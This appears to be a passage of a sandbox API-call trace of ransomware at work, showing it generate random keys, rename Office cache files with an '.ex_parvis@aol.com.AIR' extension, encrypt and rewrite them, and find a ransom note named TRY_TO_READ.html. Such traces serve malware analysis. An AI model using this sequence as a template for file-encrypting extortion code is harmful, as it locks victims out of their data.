	[0080.414] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbea0 | out: hHeap=0x540000) returned 1
	[0080.414] CloseHandle (hObject=0x480) returned 1
	[0080.415] GetProcessHeap () returned 0x540000
	[0080.415] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0080.415] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0080.415] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0080.415] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb628 | out: hHeap=0x540000) returned 1
	[0080.415] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb580 | out: hHeap=0x540000) returned 1
	[0080.415] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fb580
	[0080.415] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0080.415] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0080.415] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0080.415] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0080.415] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", dwFileAttributes=0x80) returned 1
	[0080.416] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 75
	[0080.416] GetProcessHeap () returned 0x540000
	[0080.416] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8568
	[0080.416] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab"
	[0080.416] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0080.416] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0080.418] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x480
	[0080.418] GetProcessHeap () returned 0x540000
	[0080.418] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0080.419] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=17456632) returned 1
	[0080.419] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x10a5df8
	[0080.419] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0080.419] GetProcessHeap () returned 0x540000
	[0080.419] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0080.419] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0080.419] WriteFile (in: hFile=0x480, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0080.421] WriteFile (in: hFile=0x480, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0080.421] WriteFile (in: hFile=0x480, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0080.421] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a5df8) returned 0x3a20020
	[0080.422] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a5df8) returned 0x4ad0020
	[0080.423] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0080.423] ReadFile (in: hFile=0x480, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x10a5df8, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x10a5df8, lpOverlapped=0x0) returned 1
	[0081.528] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0081.529] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0081.529] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", dwFileAttributes=0x80) returned 1
	[0081.529] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 78
	[0081.529] GetProcessHeap () returned 0x540000
	[0081.529] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x5fb580
	[0081.529] lstrcpyW (in: lpString1=0x5fb580, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml"
	[0081.529] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0081.529] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0081.561] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x480
	[0081.561] GetProcessHeap () returned 0x540000
	[0081.561] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb580 | out: hHeap=0x540000) returned 1
	[0081.561] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1606) returned 1
	[0081.561] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x646
	[0081.561] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0081.561] GetProcessHeap () returned 0x540000
	[0081.561] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0081.561] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0081.562] WriteFile (in: hFile=0x480, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0081.574] WriteFile (in: hFile=0x480, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0081.574] WriteFile (in: hFile=0x480, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0081.575] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x646) returned 0x5fb580
	[0081.575] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x646) returned 0x5fbbd0
	[0081.575] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0081.575] ReadFile (in: hFile=0x480, lpBuffer=0x5fb580, nNumberOfBytesToRead=0x646, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb580*, lpNumberOfBytesRead=0x3a1f778*=0x646, lpOverlapped=0x0) returned 1
	[0081.575] SetFilePointer (in: hFile=0x480, lDistanceToMove=-1606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0081.575] WriteFile (in: hFile=0x480, lpBuffer=0x5fbbd0*, nNumberOfBytesToWrite=0x646, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fbbd0*, lpNumberOfBytesWritten=0x3a1f778*=0x646, lpOverlapped=0x0) returned 1
	[0081.575] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb580 | out: hHeap=0x540000) returned 1
	[0081.575] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbbd0 | out: hHeap=0x540000) returned 1
	[0081.575] CloseHandle (hObject=0x480) returned 1
	[0081.576] GetProcessHeap () returned 0x540000
	[0081.576] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0081.576] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0081.576] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0081.576] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb4d8 | out: hHeap=0x540000) returned 1
	[0081.576] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb430 | out: hHeap=0x540000) returned 1
	[0081.576] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fb430
	[0081.576] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0081.576] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0081.576] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0081.576] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0081.576] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi", dwFileAttributes=0x80) returned 1
	[0081.577] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 78
	[0081.577] GetProcessHeap () returned 0x540000
	[0081.577] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x5fb4d8
	[0081.577] lstrcpyW (in: lpString1=0x5fb4d8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi"
	[0081.577] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0081.577] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0081.579] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x480
	[0081.580] GetProcessHeap () returned 0x540000
	[0081.580] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb4d8 | out: hHeap=0x540000) returned 1
	[0081.580] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2503680) returned 1
	[0081.580] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x263400
	[0081.580] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0081.580] GetProcessHeap () returned 0x540000
	[0081.580] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0081.580] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0081.580] WriteFile (in: hFile=0x480, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0081.582] WriteFile (in: hFile=0x480, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0081.582] WriteFile (in: hFile=0x480, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0081.582] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x263400) returned 0x3a20020
	[0081.582] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x263400) returned 0x3c90020
	[0081.582] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0081.583] ReadFile (in: hFile=0x480, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x263400, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x263400, lpOverlapped=0x0) returned 1
	[0081.722] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9ec5930, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da2b0
	[0081.722] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0081.722] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0081.722] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589338
	[0081.722] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0081.722] GetLastError () returned 0x0
	[0081.722] FindNextFileW (in: hFindFile=0x5da2b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9ec5930, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0081.722] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0081.722] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0081.722] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589338
	[0081.722] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0081.722] GetLastError () returned 0x0
	[0081.722] FindNextFileW (in: hFindFile=0x5da2b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1
	[0081.722] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0081.722] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0081.722] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589338
	[0081.722] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0081.723] GetLastError () returned 0x0
	[0081.723] FindNextFileW (in: hFindFile=0x5da2b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProjectMUI.xml", cAlternateFileName="PROJEC~1.XML")) returned 1
	[0081.723] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0081.723] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0081.723] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589338
	[0081.723] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0081.723] GetLastError () returned 0x0
	[0081.723] FindNextFileW (in: hFindFile=0x5da2b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30306de0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30306de0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b7cde0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x7e1dcd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProjLR.cab", cAlternateFileName="")) returned 1
	[0081.723] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0081.723] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0081.723] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589338
	[0081.723] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0081.723] GetLastError () returned 0x0
	[0081.723] FindNextFileW (in: hFindFile=0x5da2b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0081.723] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0081.723] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0081.723] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589338
	[0081.723] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0081.723] GetLastError () returned 0x0
	[0081.723] FindNextFileW (in: hFindFile=0x5da2b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9ec5930, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9eeba90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0081.723] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0081.723] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0081.723] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589338
	[0081.723] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0081.723] GetLastError () returned 0x0
	[0081.723] FindNextFileW (in: hFindFile=0x5da2b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9ec5930, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9eeba90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0081.723] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fb6c0
